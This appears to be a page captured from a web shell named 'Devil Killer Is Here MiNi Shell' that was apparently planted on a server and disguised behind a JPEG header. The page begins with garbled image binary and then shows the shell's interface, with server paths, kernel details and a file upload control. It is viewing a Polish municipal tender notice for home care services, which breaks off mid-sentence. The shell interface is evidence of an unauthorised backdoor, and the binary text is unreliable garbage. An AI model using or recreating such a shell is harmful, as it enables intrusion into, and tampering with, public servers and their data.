JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241108/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241108/0058555201-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> ŚWIADCZENIE USŁUG OPIEKUŃCZYCH NA RZECZ OSÓB STARSZYCH I NIEPEŁNOSPRAWNYCH W MIEJSCU ZAMIESZKANIA NA TERENIE GMINY MYSŁAKOWICE W OKRESIE OD 01.01.2025 r. DO 31.12.2025 r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gminny Ośrodek Pomocy Sopołecznej</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">GOPS</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 003272006</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wojska Polskiego 2A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Mysłakowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-533</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gops@myslakowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">gosp.myslakowice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ŚWIADCZENIE USŁUG OPIEKUŃCZYCH NA RZECZ OSÓB STARSZYCH I NIEPEŁNOSPRAWNYCH W MIEJSCU ZAMIESZKANIA NA TERENIE GMINY MYSŁAKOWICE W OKRESIE OD 01.01.2025 r. DO 31.12.2025 r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9c4d305d-e0b6-4dd8-95ad-ff55793d07f1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00585552</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-9c4d305d-e0b6-4dd8-95ad-ff55793d07f1 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1 Komunikacja w postępowaniu o<br/>udzielenie niniejszego zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń<br/>między Zamawiającym a Wykonawcą, odbywa się przy użyciu środków komunikacji elektronicznej.<br/>2 W postępowaniu o udzielenie zamówienia publicznego ofertę, oświadczenia, o których mowa w art. 125 ust. 1 PZP, podmiotowe<br/>środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby, a także oświadczenia o jakich mowa w<br/>rozdziale XI SWZ składa się pod rygorem nieważności, w formie elektronicznej lub postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub elektronicznym podpisem kwalifikowanym.<br/>3 W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami, w szczególności składanie<br/>oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie przy użyciu strony internetowej:<br/>ezamowienia.gov.pl. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się<br/>numerem referencyjnym postępowania.<br/>4 Komunikacja między Zamawiającym a Wykonawcami (składanie i wysyłanie dokumentów, oświadczeń, wyjaśnień, zawiadomień<br/>lub innych dokumentów) odbywa się elektronicznie za pośrednictwem: strony internetowej ezamowienia.gov.pl, Zamawiający może<br/>również komunikować się z Wykonawcami za pomocą poczty elektronicznej, e-mail: gops@myslakowice.pl (nie dotyczy składania<br/>ofert, oświadczeń oraz podmiotowych środków dowodowych).<br/>5 Wykonawca składa ofertę wraz z wymaganymi dokumentami za pośrednictwem platformy ezamowienia.gov.pl<br/>6 Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na<br/>ezamowienia.gov.pl. Wykonawca posiadający konto na ezamowienia.gov.pl ma dostęp do formularzy: złożenia, zmiany, wycofania<br/>oferty oraz do formularza do komunikacji.<br/>7 Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania ezamowienia.gov.pl, w<br/>szczególności za sytuację, gdy zamawiający zapozna się z treścią oferty przed upływem terminu składania ofert (np. złożenie oferty<br/>w zakładce „wyślij wiadomość do zamawiającego”). Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i nie<br/>będzie brana pod uwagę w przedmiotowym postępowaniu, ponieważ nie został spełniony obowiązek narzucony w art. 221 ustawy<br/>Prawo Zamówień Publicznych.<br/>8 Zamawiający informuje, że instrukcje korzystania z platformy ezamowienia.gov.pl dotyczące w szczególności logowania, składania<br/>wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu<br/>ezamowienia.gov.pl znajdują się w zakładce „Centrum pomocy&#34; na stronie internetowej pod adresem: ezamowienia.gov.pl<br/>9 Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do założenia, zmiany, wycofania oferty lub<br/>wniosku oraz do komunikacji wynosi 10 MB.<br/>10 Za datę przekazania ofert, wniosków i innych dokumentów przyjmuje się datę ich przekazania na ezamowienia.gov.pl<br/>11 Wykonawca może zwrócić się do Zamawiającego z wnioskiem o wyjaśnienie treści SWZ.<br/>12 Zamawiający zobowiązany jest do udzielenia wyjaśnień niezwłocznie, jednak nie później niż na 2 dni przed upływem terminu<br/>składania ofert, pod warunkiem, że wniosek o wyjaśnienie treści SWZ wpłynął do Zamawiającego nie później niż na 4 dni przed<br/>upływem terminu składania ofert.<br/>13 Jeżeli Zamawiający nie udzieli wyjaśnień w terminie, o którym mowa powyżej, przedłuża termin składania ofert o czas niezbędny<br/>do zapoznania się wszystkich zainteresowanych wykonawców z wyjaśnieniami niezbędnymi do należytego przygotowania i złożenia<br/>ofert. W przypadku gdy wniosek o wyjaśnienie treści SWZ nie wpłynął w terminie, o którym mowa powyżej, Zamawiający nie ma<br/>obowiązku udzielania wyjaśnień SWZ oraz obowiązku przedłużenia terminu składania ofert.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administrator Twoich danych Administratorem Państwa danych osobowych jest Gminny<br/>Ośrodek Pomocy Społecznej w Mysłakowicach reprezentowany przez Kierownika.<br/>Dane kontaktowe Z Administratorem można się skontaktować:<br/>1. Osobiście: w siedzibie Gminnego Ośrodka Pomocy Społecznej w Mysłakowicach, Ul. Wojska Polskiego 2A, 58-533 Mysłakowice<br/>2. Telefonicznie: (75) 64 70810<br/>3. Pisemnie: na adres pocztowy Ośrodka lub na adres poczty elektronicznej: gops@mysłakowice.pl<br/>Inspektor Ochrony Danych Na podstawie obowiązujących przepisów administrator wyznaczył inspektora ochrony danych, z którym<br/>może się Pani/Pan kontaktować we wszystkich sprawach dotyczących przetwarzania danych osobowych oraz korzystania z praw<br/>związanych z przetwarzaniem danych: pisemnie na adres naszej siedziby lub poprzez pocztę elektroniczną:<br/>inspektor@4consult.com.pl<br/>Cele przetwarzania, podstawa prawna przetwarzania, czas przechowywania poszczególnych kategorii danych Dane będą<br/>przetwarzane przez GOPS w celach:<br/>1. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego, którego przedmiotem jest „Świadczenie usług opiekuńczych na rzecz osób starszych i<br/>niepełnosprawnych w miejscu zamieszkania lub pobytu na terenie Gminy Mysłakowice - postępowanie nr ZP.271.02.2024,<br/>prowadzonym w trybie przetargu nieograniczonego, pisemnego.<br/>2. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy z dnia 11 września 2019 r. – Prawo zamówień<br/>publicznych (Dz. U. z 2024 r. poz. 1320 z późn. zm.), dalej „ustawa PZP”, przez okres 4 lat od dnia zakończenia postępowania o<br/>udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>Odbiorcy danych Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 18 oraz art. 74 ustawy PZP; udostępnianie danych, o którym mowa w art. 74 ust. 1 i<br/>2 ustawy PZP ma zastosowanie do wszystkich danych osobowych, z wyjątkiem danych, o których mowa w art. 9 ust. 1 RODO<br/>(szczególne kategorie danych osobowych) zebranych w toku postępowania o udzielenie zamówienia; dane osobowe, o których<br/>mowa w art. 10 RODO (dane osobowe dotyczące wyroków skazujących i naruszeń prawa), Administrator (Zamawiający) udostępnia<br/>w celu umożliwienia korzystania ze środków ochrony prawnej, do upływu terminu na ich wniesienie<br/>Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy PZP.<br/>Prawa osoby, której dane dotyczą Osoby, których dane osobowe przetwarza GOPS mają prawo do:<br/>na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących1.<br/>na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych2.<br/>na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO3.<br/>prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO.<br/>Nie przysługuje Pani/Panu:<br/>1. w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>2. prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>3. na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania<br/>danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.03.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest: &#34;Świadczenie usług opiekuńczych na rzecz osób starszych i niepełnosprawnych w miejscu<br/>zamieszkania lub pobytu na terenie Gminy Mysłakowice, w okresie od 01.01.2025 r. do 31.12.2025 r.&#34;<br/>2. Szczegółowy i ilościowy zakres przedmiotu zamówienia: przewiduje się świadczenie usług opiekuńczych w łącznej liczbie<br/>około 7 680 pełnych godzin zegarowych w okresie od 01.01.2025 r. do 31.12.2025 r., na terenie Gminy Mysłakowice .<br/>3. Realizacja powyższej usługi odbywać się będzie na następujących warunkach:<br/>1) zamówienie obejmuje świadczenie usług opiekuńczych w liczbie około 640 pełnych godzin zegarowych w ciągu miesiąca,<br/>co daje łączną liczbę około 7 680 pełnych godzin zegarowych w okresie od 01.01.2025r. do 31.12.2025r. (12 m-cy) w<br/>miejscu zamieszkania, na terenie Gminy Mysłakowice, osobom, które ze względu na przewlekłe schorzenia, wiek lub<br/>niepełnosprawność wymagają pomocy osoby drugiej,<br/>2) wyszczególniona w SWZ ilość godzin usług opiekuńczych jest ilością szacunkową i może ulec zmniejszeniu. Ze względu<br/>na charakter zamówienia nie można w sposób jednoznaczny określić w/w potrzeb, ponieważ stan zdrowia i sytuacja<br/>życiowa osób wymagających pomocy w postaci usług opiekuńczych zmienia się z dnia na dzień. Zamawiający gwarantuje<br/>realizację minimum 70% szacunkowej liczby godzin usług. W takim przypadku wykonawcy nie przysługują żadne<br/>roszczenia, w tym o zapłatę odszkodowania z tytułu zmniejszenia zakresu przedmiotu zamówienia, jak również nie mogą<br/>być podstawą do odmowy wykonania gwarantowanej części zamówienia,<br/>3) zamawiający zaznacza, że pod pojęciem wymiaru godzin świadczonych usług należy rozumieć wyłącznie rzeczywisty<br/>czas świadczenia usług, jedna godzina obejmuje 60 minut. Do czasu świadczenia usługi nie wlicza się czasu dojazdu,<br/>dojścia do mieszkania świadczeniobiorcy,<br/>4) wykonawca oświadcza, iż nie będzie dochodził roszczeń finansowych co do zmniejszonej ilości wykonywanej usługi<br/>opiekuńczej,<br/>5) liczba godzin usług opiekuńczych uzależniona jest od potrzeb mieszkańców,<br/>6) usługi opiekuńcze winny być dostosowane do szczególnych potrzeb wynikających z rodzaju schorzenia lub<br/>niepełnosprawności, w szczególności winny obejmować:<br/>a) Pomoc w zaspokajaniu codziennych potrzeb życiowych takich jak:<br/> pomoc w ubieraniu się,<br/> utrzymanie w czystości mieszkania lub użytkowanej przez podopiecznego części domu (wyrzucanie śmieci),<br/> mycie okien w pomieszczeniach mieszkalnych użytkowanych przez podopiecznych (dwa razy w roku),<br/> dokonywanie zakupów ze środków finansowych podopiecznego,<br/> pranie bielizny osobistej i pościelowej,<br/> prasowanie,<br/> przygotowywanie posiłków z uwzględnieniem diety zaleconej przez lekarza, karmienie i sprzątanie po posiłkach,<br/> umawianie wizyt, wezwanie lekarza w sytuacjach tego wymagających, realizowanie recept ze środków podopiecznego,<br/> załatwianie niezbędnych spraw urzędowych lub towarzyszenie podopiecznemu podczas ich załatwiania (bank, poczta,<br/>administracja),<br/> palenie w piecu i przynoszenie opału.<br/>b) Opiekę higieniczną, w szczególności:<br/> zapewnienie higieny osobistej podopiecznego – pomoc przy toalecie (mycie, kąpanie, czesanie, golenie, mycie włosów,<br/>obcinanie paznokci),<br/> pomoc przy załatwianiu potrzeb fizjologicznych, w tym zmiana pieluch,<br/> zmiana bielizny osobistej i pościelowej,<br/> przesłanie łóżka podopiecznego,<br/> zapobieganie powstawaniu odleżyn i odparzeń ciała podopiecznego,<br/> utrzymanie w czystości sprzętu urządzeń i sprzętu sanitarnego (miednice, wanny, kaczki, baseny),<br/> wykonywanie wszelkich innych czynności niezbędnych do zapewnienia higieny osobistej oraz higieny pomieszczeń.<br/>c) zapewnienie kontaktów z otoczeniem, które obejmują:<br/> pomoc w poruszaniu się, w szczególności w dotarciu do lekarza, na zabiegi medyczne, rehabilitacyjne,<br/> towarzyszenie w spacerach, czytaniu prasy, książek,<br/> pomoc w komunikowaniu się z innymi,<br/> powiadomienie rodziny lub lekarza rodzinnego o istotnych zmianach w zachowaniu podopiecznego wskazujących na<br/>pogorszenie stanu zdrowia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85000000-9 - Usługi w zakresie zdrowia i opieki społecznej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85311100-3 - Usługi opieki społecznej dla osób starszych</p> <p class="mb-0">85311200-4 - Usługi opieki społecznej dla osób niepełnosprawnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-01 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty zostaną ocenione przez Zamawiającego w oparciu o następujące kryteria i ich znaczenie:<br/>1) Cena ( C ) 60,00% 60 punktów<br/>2) Doświadczenie (DK) 40,00% 40 punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie koordynatora</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy nie podlegają wykluczeniu zgodnie ze wskazaniami<br/>określonymi w SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie określa warunków udziału w postępowaniu w powyższym zakresie,<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie określa warunków udziału w postępowaniu w powyższym zakresie,<br/>3) sytuacji ekonomicznej lub finansowej: Wykonawca spełni warunek, jeżeli przedstawi, że:<br/>a) jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem<br/>zamówienia tj. pomocy społecznej lub usług dla osób w podeszłym wieku lub niepełnosprawnych w miejscu ich<br/>zamieszkania ze wskazaniem w zakresie działalności związanej przedmiotem zamówienia na kwotę nie niższą niż<br/>100.000,00 zł na okres realizacji zamówienia.<br/>4) Zdolności technicznej lub zawodowej: Wykonawca spełni warunek, jeżeli przedstawi, że:<br/>a) wykonał należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest<br/>krótszy – w tym okresie co najmniej dwie usługi odpowiadające swoim rodzajem usługi stanowiące przedmiot zamówienia<br/>(tj. świadczenie usług opiekuńczych dla jednostek samorządowych zgodnie z przepisami ustawy z dnia 12.03.2004 r. o<br/>pomocy społecznej), w liczbie nie mniejszej niż 8 000 godzin usług opiekuńczych rocznie i o wartości nie mniejszej niż<br/>350.000,00 zł brutto rocznie,<br/>b) Wykonawca spełni warunek, jeżeli wykaże, że dysponuje lub będzie dysponował minimum 10 osobami rocznie zdolnymi<br/>do wykonania zamówienia tj. posiadającymi doświadczenie, umiejętności oraz stan zdrowia fizyczny i psychiczny<br/>umożliwiający wykonanie przedmiotu zamówienia,<br/>c) Wykonawca spełni warunek, jeżeli wykaże, że dysponuje lub będzie dysponować jedną osobą zatrudnioną w biurze<br/>wykonawcy, pełniącą funkcję koordynatora usług, mającą co najmniej pięcioletnie doświadczenie w zarządzaniu usługami o<br/>podobnym 